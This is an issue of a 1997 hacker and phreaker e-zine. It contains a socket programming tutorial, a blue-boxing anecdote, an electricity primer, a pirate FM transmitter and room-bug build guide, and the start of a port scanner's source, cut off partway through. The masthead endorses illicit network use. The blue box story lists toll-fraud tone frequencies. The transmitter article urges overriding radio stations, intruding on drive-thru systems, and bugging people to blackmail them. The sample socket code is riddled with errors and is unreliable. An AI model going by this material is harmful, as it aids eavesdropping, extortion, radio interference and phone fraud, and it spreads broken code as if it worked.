Copy Link
Add to Bookmark
Report
The Havoc Technical Journal 10
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³The HAVOC Technical Journal ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
Vol. 1 | No.10 | May 1st, 1997 | A HAVOC Bell Systems Publication
"Will someone please ICMP 127.0.0.1? That guy is an asshole!" -iCBM
_____________________________________________________________________________
-[The HAVOC Technical Journal Issue 10]-
Editorial..............................Scud-O
Network Programming for the Beginner...Scud-O
A Blue Box Story.......................memor
Basic Electricity......................ec|ipse
Pirating Your Own Radio Station........DataThief
French Pager Annoying..................memor
Unix Port Prober - prober.c............Scud-O
udp-scan.c [ from Satan 1.1.1 ]........Wietse Venema
phf.c (Again)..........................Scud-O/memor/[others]
The history of digital technology......REality
Scanning for losers....................shamr0ck
REality's Digital Dictionary...........REality
K-Kool hackers chat here!..............KungFuFox
The News...............................KungFuFox
Phonecalls.............................THTJ
-------------------------------------------------
PLEASE NOTE: HBS's and THTJ's Web site is moving! Take note as Scud-O
will be replacing his page with his own shit and code soon!
The new site is still under wraps, stay tuned to thtj for more info,
and look at the current geocities web site, which will lead you to the new
site.
_____________________________________________________________
Each pushes a weight against his chest, and howls
At his opponent each time that they clash:
"Why do you squander?" and "Why do you hoard?"
Each wheels To roll his weight back round again; they rush
Toward the circle's opposite point, collide
Painfully once more, and curse each other afresh...
The Inferno of Dante, Canto VII
[ Subliminal Message: Get Inferno OS NOW! http://www.lucent.com/inferno/ ]
_____________________________________________________________
The HAVOC Technical Journal - Information
- Editor in Chief : Scud-O, FoxMulder@worldnet.att.net
- Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@juno.com
- THTJ website: http://www.geocities.com/SiliconValley/8805
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784
The HAVOC Technical Journal Vol. 1, No.10, May 1st, 1997.
A HAVOC Bell Systems Publication. Contents Copyright (©)
1997 HAVOC Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or
in part without the expressed written consent of HAVOC
Bell Systems Publishing. [No copying THTJ, damnit.]
The HAVOC Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we
do endorse that stuff. We just don't wanna get in trouble
if you try it for yourself and something goes wrong.]
For infomation about using articles published in THTJ, send mail to:
e-mail: thtj@juno.com
mail: THTJ
c/o HBS
PO Box 448
Sykesville, MD 21784
_____________________________________________________________
[Editorial : by Scud-O]
Ok, I had a great editorial all written up, but some things have
been going on, and I do not want to offend people, so I killed what I had
written up. So naturally there is no editorial. Sorry.
Hey, anyway, check out the new HBS site. I was bored with the old one
so I bombed it, and made a whole new site. and dont worry, the 'After the
Aftermath' doesn't mean that HBS or THTJ is going to die, we are stronger
than ever, so dont worry.
I would like to send thanks out to KungFuFox, not only for editing
THTJ 9, but for majorly helping me out with THTJ. I owe you big Kung!
Also, thanks go to JP, who has risen AntiOnline from a new site on
a terribly slow connection, and a huge URL, to one of the largest hacking
sites on the web, and its own domain. Keep it coming JP! And JP, I owe you
too, thanks for your kind, witty advice, and for making a kick ass site, so
I felt bad about my site, and fixed it up, majorly.
And finally, wrath.sepulchre.org is gone. This is upsettting to me
since I was planing on moving my site, but thanks to too many lamers that
abused BitchX, wrath was K-Lined, and well after getting too many complaints
from sysamdins, chiapope pulled the plug. So, thanks a hell of a lot to you
lamers that made chia do this. ( You know who you are..... buncha punks...)
[ AntiOnline: http://www.antionline.com ]
[ RIP : wrath.sepulchre.org ]
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-
FoxMulder@worldnet.att.net | http://www.geocities.com/SiliconValley/8805
(Hey, I'm left handed, so if ya dont like the quote, fuck you! )
"Any group that includes Charlemange, Rock Hudson, Paul McCartney,
Leonardo da Vinci, Benjamin Franklin, Jack the Ripper, and the
Boston Strangler must be select, if not elite."
-author James de Kay talking about left handers
The Truth May Be Out There (Call Me If You Find It)
_____________________________________________________________
[Network Programming for the Beginner]
A Tutorial by Scud-O
Network programming is the heart of UNIX programming. It is as simple
as that. (Well, ok not all programs need to communicate via a network, or
modem, but network programming is still none the less an important part to
UNIX.) And since this important topic can be so complex and compicated, I
decided to write this primer on sockets and socket programming. Now this
article is anything but complete and indepth, since this is only to give you
the basics. With this you can start writing various utilities and firewall
holes, whatever, but if you really want to know more, go out and buy the 3
volume set of books: TCP/IP Illustrated from Addison Westley Publishing.
Although i currently do not have this 3 volume set, ( hell, im too busy
saving up for my new car and a new hard drive!) I always stop by Borders and
spend a few hours reading it, of stealing my friends copy for a few days.
Ok, anyway, there are a few basic calls and protocols that you will
use for the connection.
o socket()
o bind()
o listen()
o accept()
o setsockopt()
o getsockopt()
o connect()
o sendto()
o recvfrom()
You must also decide on which type of protocol that you will use:
o Connection Based (TCP)
o Connectionless (UDP)
[Ports and Sockets]
Network Programming is based on the use of sockets to accept and send
information. As i showed above, there are 2 main protocols that you can use
to send information. Transmission Control Protocol ( TCP ) and User Datagram
Protocol ( UDP ) are your 2 choices. TCP is a connection based protocol,
which means that when you open up a port you send a 3 way handshake, and
usually login with a user id and password. UDP is a connectionless protocol,
which means that no login in is made, and a handshake is not done, so
connections can be easily lost, and errors are common, however this is an
easier protocol to implement (or so i think). Basically, the main difference
is that with TCP a connection is set up first, while in UDP, data is
exchanged as part of the message. Both protocols require you to have a port
number which you open up to, to transfer information. numbers are used so a
computer doesn't have to 'read' want applications are running ( why do you
think UNIX uses pids? ). It also makes it easy for the os to know how many
applications are running at any given time.
Technically, the port numbers could be assigned by the system
administrator, but for the most part ( about 99% ) servers uses some standard
conventions for assigning ports so machines can communicate. Port numbers are
assigned from 1 and go on up. For the most part ports above 255 are for the
local systems use only, but with everything, there are exceptions ( irc at
port 6667 or httpd at 8080 for example ). The ports from 1 to 255 are for
most networking services.
Each network connection ( both going into and out of ) a host's port
is uniquely identified by a combination of 2 numbers, the ip address of the
machine and the port number in use, which together make up a socket.
Because at least 2 computer will be involed with the connection,
there are sockets on both the sending and recieving ends of the connection.
And since both the ip addresses and the ports are unique to each machine, the
sockets are thus unique, and this lets applications talk yo each other across
the network based entirely on the socket number.
Both machines on the connection maintain port lists that list all
active ports, and the 2 machines involed have reversed entries for each
session between the two, a process called binding. For example, if one
machine has a source port at 23 and the destination at 25, the other machine
will have a source port at 25 and a destination at 23.
[Socket Programming]
Linux supports BSD style socket programming, so everything here
should work on either Linux or and of the BSD platforms.
Well, once again, here is the list of the main socket C functions you
will be using.
o socket()
o bind()
o listen()
o accept()
o setsockopt()
o getsockopt()
o connect()
o sendto()
o recvfrom()
[ The socket() System Call ]
The socket() system call creates a socket for the client of the
server.
The socket() function is defined as:
#include <sys/types.h>
#include <sys/socket.h>
int socket(int family, int type, int protocol)
For linux, the family equals AF_UNIX. The type would be either
SOCK_STREAM ( socket stream: slow, reliable connection) or SOCK_DGRAM
( socket datagram: fast, less reliable connection). The protocol should
be IPPROTO_TCP for SOCK_STREAM and IPPROTO_UDP for SOCK_DGRAM.
The return value from this function is -1 if an error occured,
otherwise it is a socket descriptor. You use the socket descriptor to refer
to this socket in all calls in your program after a successful socket() .
Sockets are created without names, since bind() is used by the
clients to read or write to a socket.
[ The bind() System Call ]
The bind() call assigns a name to an unnamed socket. Bind is
defined as:
#include <sys/types.h>
#include <sys/socket.h>
int bind(int sockfd, struct sockaddr *saddr, int addrlen)
The first item is a socket descriptor, the second is a structure
holding the name to use, and the last item is the structure's size.
Now that you have bound an address for your client or server, you can
either connect() to it (if your code is a client) , or listen() to it, (if
your code is a server). First i'll show you listen() and a few other calls
that servers use, and then we will get to clients.
[ The listen() System Call ]
The listen() system call is used by the server. It is defined as:
#include <sys/types.h>
#include <sys/socket.h>
int listen(int sockfd, int backlog);
The sockfd is the socket descriptor, and the backlog is that
wonderful little backlog queue that daemon9 showed us how to exploit in
phrack 48. It holds the number of pending connections before any are
rejected. Use the standard value of 5 for this. A return value of less than 1
is a error.
If this call is successful, you can now accept connections.
[ The accept() System Call ]
accept() is used by a server to accept any incoming messages from
a client's connect() call. Be aware that this function does not return if no
connections are recieved. It is defined as:
#include <sys/types.h>
#include <sys/socket.h>
int accept(int sockfd, struct sockaddr *peeraddr, int addrlen);
The parameters are the same for the bind() call, except that peeraddr points
to information about the client that is making the connection request. Based
upon the incoming message, the fields in peeraddr are filled out.
[ The connect() System Call ]
connect() is used by a client program to connect to a server when you
are using a connection-based system (ie, TCP). This call should be made after
you have bind()ed the connection. It is defined as:
#include <sys/types.h>
#include <sys/socket.h>
int connect(int sockfd, struct sockaddr *servaddr, int addrlen);
As you can see, the parameters are the same as those for the bind
call except for that servaddr points to info about the server that the client
is connecting to. The accept() call creates a new socket for the server to
work with the request. This way, the server can fork() off a new process and
wait for more connections.
[ setsockopt(), getsockopt(), and the Linux bug ]
You may not know this, but there is a major bug in Linux's socket
libraries. The bug is that even if you have closed a socket properly, you
cannot reuse that socket.( I think daemon9 discussed this in his TCP/SYN
article for phrack 48, and i think that his ideas on what was causing the
problem is right, but that remains to be seen. ) For example,if you write
a server that waits on a socket, it opens the socket and listens on it with
a single problem. However, if the server either crashes or normally
terminates and you restart the server, you can not bind back to the same
port. The error codes from bind() keep returning an error indicating that the
port you are trying to connect on is already bound by another process.
The problem lies in the fact that Linux's kernel never marks ports as
unused when the process that is using the socket terminates.
To get around this, the solution is to use setsockopt() to set the
options on the socket when it is opened, and before a connection is made. The
setsockopt() sets options and the getsockopt() call gets options for a given
socket.
The syntax and definition of the 2 calls are:
#include <sys/types.h>
#include <sys/socket.h>
int setsockopt( int sockfd, int level, int name, char *value,
int *otplen)
int getsockopt( int sockfd, int level, int name, char *value,
int *otplen)
Once again, the sockfd must be an open socket, level is the protocol
level, either IPPROTO_TCP for TCP/IP or SOL_SOCKET for socket level options.
Name is the option as defined in the socket's man page. the *valeu pointer
points to the location where a value is set by getsockopt() and must be set
by you when calling setscokopt().
The full man page for this is under man page setsockopt(2). Have fun
reading it.
Now, back to the bug. When you open a socket, you must also call the
setsockopt() function like so:
#ifdef LINUX
opt = 1; len = sizeof(opt);
setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&opt,&len);
#endif
You only will need the #ifdef and #endif if you want to be able to
quickly and easily port this code, since some UNIX systems dont support the
SO_REUSEADDR flag.
[ Sample Code: A Socket Oriented Server ]
/********************************************************
* Sample Code: A Socket Oriented Server, from THTJ 10
* Written By Scud-O of HBS
********************************************************/
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/net.h>
#define PORT 1152 /* Use what ever you want, it doesn't matter */
main(int argc, char *argv[])
{
int sockfd, newfd;
int cpid; /* child id */
struct sockaddr_in servaddr;
struct sockaddr_in client_info;
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0) < 0 )
{
myabort("Unable to create socket");
}
#ifdef LINUX
opt = 1; len = sizeof(opt);
setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, &len));
#endif
bzero((char *)&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
servaddr.sin_family = htons(PORT);
/******************
* the htonl ( for a long integer ) and htons ( for short integer ) convert
* a host oriented byte order * into a network order.
*******************/
if(bind(sockfd, sockaddr *)&servaddr, sizeof(struct sickaddr)) < 0)
{
myabort("Unable to bind socket");
}
listen(sockfd, 5);
for(;;)
{
/* Wait here.... */
newfd = accept(sockfd, (struct sockaddr *)&client_info,
sizeof(struct sockaddr);
if(newfd < 0)
myabort("Unable to accept on socket");
if(( cpid = fork()) < 0)
myabort("Unable to fork on accept");
else if (cpid == 0)
{
/* Child Process */
close(sockfd); /* We dont need the original anymore */
/* Place your code for what you want the server to do where
do_what_ever_here(newfd); is ! */
do_what_ever_here(newfd);
exit(0);
}
close(newfd); /* were back in the parent */
} /* end of for loop */
/* Good Bye! */
}
Ok, so basically, the conection based server does the following things:
o Creates a socket with socket()
o Binds itself to an address with bind()
o Listens for connections with listen()
o accept any incoming connections with accept()
o Gets incoming messages with read() and writes with write()
[ read() and write() will be in your do_what_ever_here() call! ]
NOTE: myabort() should be a procedure YOU create to handle error messages,
and then kill the process, restart, etc.
Now, for a client.....
[ The Client ]
/********************************************************
* Sample Code: A Socket Oriented Client, from THTJ 10
* Written By Scud-O of HBS
********************************************************/
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/net.h>
#define PORT 1152 /* Use what ever you want, it doesn't matter */
#defne MY_HOST_ADDR "Put.Your.IP.Here"
int getServerSocketId()
{
int fd, len;
struct sockaddr_in unix_addr;
/* Create a Unix domain stream socket */
if( (fd - socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
{
return(-1)
}
#ifdef LINUX
opt = 1; len = sizeof(opt);
setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, &len);
#endif
/* Fill socket address structure with our address */
memset(&unix_addr, 0 , sizeof(unix_addr));
unix_addr.sin_family = AF_INET;
/* Convert internet address to binary value */
unix_addr.sin_addr.s_addr = inet_addr(MY_HOST_ADDR);
unix_addr.sin_family = htons(PORT);
if(bind(fd, (struct sockaddr *) &unix_addr, len) < 0)
return(-2);
memset(&unix_addr, 0, sizeof(unix_addr));
if(connect(fd, (struct sockaddr *) &unix_addr, len) < 0)
return(-3);
return(fd);
}
/* Add in main() function, do whatever you like to send out
error messages, etc..... */
The client does the following things:
o Creates a socket with socket()
o Attempts to connect with connect()
o If a connection is made, request data with write(), read info with
read() [ NOTE: these would be called in main() ]
Now, for a connectionless socket example
[ Connectionless Sockets : The Server ]
Ok, first we will need to know the few, subtile, but important
differences with connectionless socket programming. The first main principle
is that the server uses recvfrom() instead of listen() and accept(). And, to
reply to messages, sendto() is used.
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/net.h>
#define PORT 262 /* Use what you wish */
#define MAXM 4096
chat mesg[MAXM];
main(int argc char *argv[])
{
int sockfd, newfd;
int cpid; /* for child process id */
struct sockaddr_in servaddr;
struct sockaddr_in client_info;
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0) < 0 )
{
myabort("Unable to create socket");
}
#ifdef LINUX
opt = 1; len = sizeof(opt);
setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, &len));
#endif
bzero((char *)&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
servaddr.sin_family = htons(PORT);
/******************
* the htonl ( for a long integer ) and htons ( for short integer ) convert
* a host oriented byte order * into a network order.
*******************/
if(bind(sockfd, sockaddr *)&servaddr, sizeof(struct sickaddr)) < 0)
{
myabort("Unable to bind socket");
}
for(;;)
{
/* Wait here.... */
n = recvfrom(sockfd,mesg, MAXM, 0, (struct sockaddr *)&client_info,
sizeof(struct sockaddr));
/* Place what server is to do in here. */
do_what_ever_here(mesg);
sendto(sockfd, mesg, n, 0, (struct sockaddr *)&client_info,
sizeof(struct sockaddr));
} /* end of for loop */
/* Good bye! */
}
As you can see, connectionless programming is much easier than connection
based programming, but i still advise against using connectionless, since
errors are very common. And, a pain lies in that you must process each
message one at a time, since messages from multiple clients can be
multiplexed together. In the connection based model, the child process always
knows where each message is coming from.
The client, doesn't need to call the connect() call either, instead
it calls sendto() directly. For a client side of the connectionless
connection, use the same code as in the server, but note that sendto() is
called before recvfrom(), as so:
#include <sys/types.h>
#include <sys/socket.h>
int sendto(int sockfd, const void *message__, /* pointer to message*/
int length, /* of message */
unsigned int flags, /* of routing, leave as 0 */
const struct sockaddr * client, /* where to send it */
int length ); /* of sockaddr */
NOTE: Uses this call, not sendmsg(), since sendto() is more efficent
Any errors are returned as -1, and only local errors will be
detected.
recvfrom() looks like:
#include <sys/types.h>
#include <sys/socket.h>
int recvfrom(int sockfd, const void *message__, /* pointer to message*/
int length, /* of message */
unsigned int flags, /* of routing, leave as 0 */
const struct sockaddr * client, /* where to send it */
int length ); /* of sockaddr */
Note that iff the message is too long to fit in the buffers, the
extra bytes will be discarded. The call could return immediately, or it could
wait forever, it all depends on the type of flag that is sent. I also
recommend that you set timeout values, read the man page for recvfrom, since
this info changes from server to server.
Ok, well, this is all for this beginner on Socket Programming. I have
barely even started to get to the core of socket programming, but one can
only devote so much time to a subject. For more information, check out the
book : 'UNIX Network Programming' by W. Richard Stevens ( Prentice Hall,
1990) this is by far the most comprehensive guide out there, and most
Universities use it for a text book for thier advanced C classes.
_____________________________________________________________
[A Blue Box Story]
by memor
Israel Blueboxing is born because we found a Teletel Gate that we can
access via a local israel number.
**************************
*Remember Teletel Network*
**************************
It is a V23 interface (1200/75Bauds that you can access with USR sportster,
changing S38 register with ATS38=4&w &w for saving changes).
It is under some Videotex Terminals. There are many kinds of that terminals,
the first one made by France Telecom nammed "Minitel", it is like a modem +
console.. The modem is a CAP23(1200/75bauds remote .. To 9600Bauds Local)
and the console is Videotex (40 Cols mode or 80 Cols), the 40 Cols mode is
the most used because its a graphical mode and 80 Cols is only a text mode.
You activate Graphism mode on 40Cols with a $0e sent (Control + N) , after
you calculate the graphism you send on a caracter with that method:
*********
*$01*$02* example: if you want to make that graphism : ²
********* ²²
*$04*$08* ²
*********
*$10*$40* You will have to make lightning $01,$04,$10 and $08 with that
********* algorythm : $20 + $01 + $04 + $08 + $10 = $3D
So you'll have to send to the local console a $0E , $3D.
Colors(or gray scale if the minitel console is monochrom) or minitel are
accessible with thoses commands sent to the local console:
Text Color:
***********
ESC @ - BLACK -
ESC D - DARK BLUE -
ESC A - RED -
ESC E - PURPLE -
ESC B - GREEN -
ESC F - LIGHT BLUE-
ESC C - YELLOW -
ESC G - WHITE -
Background Color:
*****************
ESC P - BLACK -
ESC T - DARK BLUE -
ESC Q - RED -
ESC U - PURPLE -
ESC R - GREEN -
ESC V - LIGHT BLUE-
ESC S - YELLOW -
ESC W - WHITE -
You can use some effects on videotex terminal.. like thoses ones:
Effect:
*******
ESC Z : underlining
ESC Y : Stop Underlining
ESC ] : Inverse Video Mode
ESC \ : Normal Video Mode
CONTROL + N : Graphism Mode
CONTROL + O : Text Mode
ESC H : Flash On
ESC I : Flash Off
Normally on bbs (v32 v34...), file transfer are done in Zmodem,Ymodem,
Xmodem or others Kermit... On Teletel Terminal or videotex RTC (Commuted
Telephone Networks.. little BBS 1200/75 V23) are done in BBT protocole,
a real slow and bad one (BBT protocol are free on ftp.teaser.fr or
ftp.minitel.fr,recently hacked with some libroot.gz,unreachable)
Little Videotex RTC answer output exemple:
/* Minitel send a carrier on a "RING" */
atz<cr> /* Software Reset*/
OK
ats34=8<cr> /*Configuring modem for V23*/
OK
*** executing answer script
RING
RING /*Answer after 2 rings because S00
sportster register S00=02*/
ata<cr> /*Send a carrier*/
CONNECT 1200/75 /*Connected to Cap23 or Minitel*/
*** connected
*** run c:\usr\minitel\minitel.exe
for more informations about teletel networks, email
(France Telecom main server administrator) root@ftp.minitel.fr
(A really known Teletel programmer and Graphist) chip@mail.teaser.fr
(A videotex Graphist) darkseed@avo.net
***********************
*Back To Bluebox Story*
***********************
So, just like I said before , I and some phreakers friends were trying
to bluebox on ISRAEL for calling for free that teletel gate (Israel allow
only local dials with blueboxing) frequencies(mf) were :
Frequencie1: F1: 2650
F2: 2250
Lenght: 175ms
Delay: 10ms
Frequencie2: F1: 2420
F2: 2400
Lenght: 345ms
Delay: 10ms
And the dial was AxxxxxxxxC A for local call.. B hanged up directly after
some "disconnect" beeps and A + routine code + country code hanged up too,
well only local call allowed.
After 1 month of total blueboxing of some of us , a mass
bust of DST came (DST == Territory Security Department)... the cops ,
after taking our computers (Atari STe , Mega St.. Amiga 500 and 1200 +
Screens + Modems and all the hardware interfaces) and they just asked
us if we were from the israelite spy service nammed Mossad.. We were only
using thoses israel free phones numbers (080090xxxx) for using minitel
with free calls.
on Atari (Mega)St(e) , we were using Breeblebox.
on Amiga 1200 , we were using Ultimate Access
memor 04/09/97
*********************
*Some infoz about me*
*********************
my emails memor@mygale.org
memor@stepahead.net
my phreaker page with links : http://www.mygale.org/00/memor
_____________________________________________________________
Basic Electricity - by ec|ipse.
1.1 The Electron Theory
All the effects of electricity can be explained and predicted by
assuming the existence of a tiny particle called an electron. All the
electrical or electronic devices used today have one thing in common,
they are concerned with the controlling of electron movements. Three
fundamental invisible quantities; voltage, current, and resistance are
present in every electrical circuit. These quantities are controlled
and directed by the proper arrangement of component parts to produce the
desired electron movement.
1.2 Voltage (Abbreviated as E)
Voltage is an electromotive force or pressure that causes electrons to
move. If we consider a battery, it has a negatively charged pole and a
positively charged pole. An electron is a small particle with a
negative charged pole. An electron is a small particle with a negetive
charge so it will be pulled to the positive pole and pushed away by the
negative pole of the battery. The strength of the push and pull is
governed by the difference in potential of the two poles. The potential
difference is a force that can cause electrons to move from negative to
positive and it is measured in volts.
1.3 Current (Abbreviated as I)
The movement of electrons along a wire is called current flow and
because electrons move from negative to positive, current is also said
to flow from negative to positive. Current is produced by voltage and
the rate that current is flowing is measured in amperes, similar to the
way we measure water flow in gallons per second.
1.4 Resistance (Abbreviated as R)
When an electrical current flows through a conductor, there is a loss
of energy or opposition to the flow similar to the friction that occurs
when water flows through a pipe. The cause of this loss in an
electrical circuit is called resistance and is measured in ohms. A
difference in potential of one volt will cause one ampere to flow though
one ohm of resistance. This is the basis for Ohm's Law which gives the
relationship for E, I and R in all electrical circuits involving only
resistance.
1.5 Prefixed Used With Electrical Units
In measuring currents, voltages, and resistances, the ampere, volt, and
ohm, respectively are not always units of convenient size. Related
units are often used that have values 10, 100, 1,000 or more times
larger or smaller than these fundamental units. The size indicated by a
prefix added to the fundamental name of the unit as follows:
Mega 1,000,000 = 10(6)
Kilo 1,000 = 10(3)
Deci 1/10 = 10(-1)
Milli 1/1,000 = 10(-3)
Micro 1/1,000,000 = 10(-6)
Pico 1/100,000,000,000,000 = 10(-12)
The most common of these that you will encounter are as follows:
A milliampere often referred to as a "milli" is 1/1,00 or .001 amperes.
A kilohm is 1,000 ohms.
A megohm is 1,000,000 ohms.
A microfarad, used for measuring capacitance, is referred to as a "mike"
and is 1/1,000,000 of a farad.
1.6 Ohm's Law
I have briefly mentioned Ohm's Law when giving some of the preceding
definitions, and it is the most important single principle in
electricity. Maybe we should take a brief look at the law and what it
means before we go any further.
Expressed as an equation, the law becomes:
I = E/R
By manipulaiton, the law can also be writen as:
R = E/I or E = I x R
An easy way to remember these three equations of Ohm's law is to draw a
circle and divide it in two with a horizontal line. Place E in the top
half of the circle, and divide the lower half of the circle with the
vertical line placing I to the left of the line and R to the right of
the line. If you wish to find the voltage (E), place your thumb over E
and you find E = I x R. If you wish to find the aperes (I), place your
thumb over I and you find I = E/R
1.7 Difference of Potential
We often hear the statement "all we need to make a relay operate is
battery and ground." This is true, but it would be more correct to say
"all we need to operate a relay is a 'Difference of Potential'." If
you learn to look at it this way, you will find it much easier to
understand the biasing of transistors at a later date. The force
or effect that causes the electron flow between our battery and ground
is simply a difference of potential. So let us have a look at what we
mean by a difference of potential.
Because electron flow if from negative to positive, the negative side
of a battery could be said to push the electrons, and the positive side
of a battery could be said to pull the electrons.
If we were using a 50 volt battery supply (standard office voltage) it
is the sum of the negative push and the positive pull which gives us
our total of Electron Moving Force, or pressure that is exerted on the
electrons. This force or pressure is properly known as Voltage or
Electromotive Force (E.M.F.).
In actual practice, we ground the positive side of our battery and then
ground the side of the relay that would have gone to the positive
battery terminal. Now you can see why we say "all we need to make our
relay operate is battery and ground". But nothing has changed, really.
Our potential difference and current flow will remain the same.
1.8 Booster Battery
We have another battery supply in a central office known as booster
battery which is usually either 50 or 60 volts. However, our external
connections are reversed. That is to say, the negative side of the
battery is connected to ground and the positive side is connected to
the load.
The Rule for electron movement, negative to positive, still applies.
_____________________________________________________________
-------------------------------------
--=[Pirating Your Own Radio Station]=--
Written by DataThief - Built by DataThief and Delcon
-------------------------------------
Here it is hackers and phreaks - How to build your own radio station.
I'm sure you have all wanted your own way to communicate to the masses at
one time or another, or if not, this can also be used as a wireless room
bug. The actual construction is only about 2 x 3 x .5 inches including AA
battery (AT MAX).
Supplies:
Symbol on
Name Value/Item # Quantity Diagram
--------------------------------------------------------------------------
Soldering iron
A PC Board 4030 1
Capacitator 100pF (marked 101) 1 C2
Capacitator 10pF (marked 10) 1 C3
Capacitator 4pf (marked 103) 2 C4,C6
Capacitator 0.01uF (marked 103) 1 C5
Resistor 10 kOhm (Br,Bl,Or,Go) 1 R1
Resistor 1.2 kOhm (Br,Re,Re,Go) 1 R2
Resistor 33 kOhm (Or,Or,Or,Go) 2 R3,R5
Resistor 100 Ohm (Br,Bl,Br,Go) 1 R4
Resistor 180 Ohm (Br,Gr,Br,Go) 1 R6
Transistor 2SC1923 (marked C1923) 2 TR1,TR2
Electret Condenser Mic 1 ECM
Electrolytic Capacitor 10uF 2 C1,C7
Coil 0.27-0.30uH 1 L
1.5 Volt Battery (AA,AAA,N battery) 1 B
1.5 Volt Battery holder 1 BH
1 Toggle Switch with 2 prongs on back (not 3) 1 S
And some insulated copper wire
KEY: Br = Brown
Bl = Black
Or = Orange
Go = Gold
Re = Red
These are all the supplies needed for the bug, and will allow a signal that
carries about 50-100 feet over a clear FM channel (the FM range is between
71-79 FM). For a radio station, I suggest you add a bigger amp and a much
larger antenna (I use a CB antenna to transmit about 1-2 miles..)
___________________________________________________________
| Block Diagram |
| ANT |
| \./ |
| _____ECM____ ____TR-1____ ____TR-2___ | |
| | Condenser | | Oscilator/ | | | | |
| | Microphone |---->| Modulator |---->| Amplifier |---' |
| `------------' `------------' `-----------' |
| |___________________|__________________| |
| | |
| __________ |
| | Power | | Supply
| | Supply | |
| `----------' |
| |
`-----------------------------------------------------------'
\./
Schematic Diagram |ANT.
.----------------*----*------*------*----------*-----*----|--*----.
| | | | | | | | | |
\ \ |C5/ |C4/4P ) \ \ | | |
/ R2/ R3/ / === === )l R5/ / R6/ / | | |
\ 1.28K 33K \ |0.01u | )*-. 33K \ 180 \ | | |
/ / _|___ | ) | / / | | |
| | /// *------' | | *----' | |
--- | R1/ ||+ | _/ | | || | |/ + | |
| E |---*--/\/\/\---||---*-------|_ ===C3/ `--||---*---|TR2 ==== |
| C | 10K || | TR1\ | 10P || |\ C7/ | |
| M |---. C1/10u | `* C6/4P | 10u | |
`---' | | | | | |
| | / | | |
| | R4/ \ | | |
| C2/ | 100 / | | |
| 100P === \ | | |
| | | | | |
`----------------*-----------*-----------------------*-------* |
| |
DC-IN (-)---------' |
(+)--------------'
Well, that's the best I can do in text. If you are seriously interested in
building one, and you can't read this well enough, I might make one as a gif
or something. I hope you enjoy it, and don't get caught.
A few suggestions you could do to have lots of fun with your new pirate
radio station:
1) You could piss alot of hicks off by transmitting over a local country
station and tell them how much they suck!
2) You could piss alot more people off by transmitting over the most popular
radio station and advertising for your own, or playing some hard techno.
3) If you're really good, find out what frequency McDonald's or some fast
food joint's drive-thru voice system works on and modify the transmitter
so it breaks through...I'm working on this one.
4) Use it as a bug to spy and blackmail someone.
I've wasted enough time writing this bitch, so spread the knowledge, and if
you don't like it, maybe someone else will, because drawing that diagram (as
shitty as it is) took me forever!
"l8r hackerz and phreaks!....This iz WFA-Q Fuck U signing off..."
DataThief
Greetz:
Scud-O
Delcon
KeyStroke
od|phreak
KungFuFox
The members of HBS, Area66 and X-TREME
All the others I forgot because my mind blanked out.
_____________________________________________________________
[prober.c - by Scud-O version 1]
/***********************************************************************
* prober.c -- Unix Port Prober, by Scud-O for THTJ 10, released 5/1/97
************************************************************************
* NOTE: This biatch doesn't have UDP working, since well, it is
* connectionless, and that is a pain in the ass to get done right. If
* You really want UDP, code it yourself, it really shouldn't be that hard,
* But most important services run off of TCP ports, not UDP.
*************************************************************************
* compile: cc -o pscan -s pscan.c
*************************************************************************
* NOTE: for NIS listing to work right, the domain name, must be what you
* pass as the remote host, otherwise problems are afoot.
************************************************************************/
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <rpc/pmap_prot.h>
#include <rpc/pmap_clnt.h>
#include <rpcsvc/yp_prot.h>
#include <rpcsvc/ypclnt.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#ifdef __GNU_LIBRARY__ /* this is needed for the GNU C library */
#include <getopt.h>
#else
extern int optind;
#endif
#define LOWEST_PORT 1
#define HIGHEST_PORT 8080 /* The Sky is the limit! */
#define MAJOR 1
#define MINOR 1
static char sccsid[] = "@(#) Prober v1 , for The HAVOC Technical Journal 10 5/1/97";
typedef enum {
false,
true
} bool;
typedef enum {
s_none,
s_tcp,
s_udp,
s_rpc,
s_nis
} scan_t;
#ifdef __GNU_LIBRARY__
static struct option long_options[] = {
{"tcp", 0, 0, 0},
{"udp", 0, 0, 0},
{"rpc", 0, 0, 0},
{"nis", 0, 0, 0},
{"help", 0, 0, 0},
{"version", 0, 0, 0},
{0,0,0,0}
};
#endif
struct {
char *alias;
char *mapname;
bool inuse;
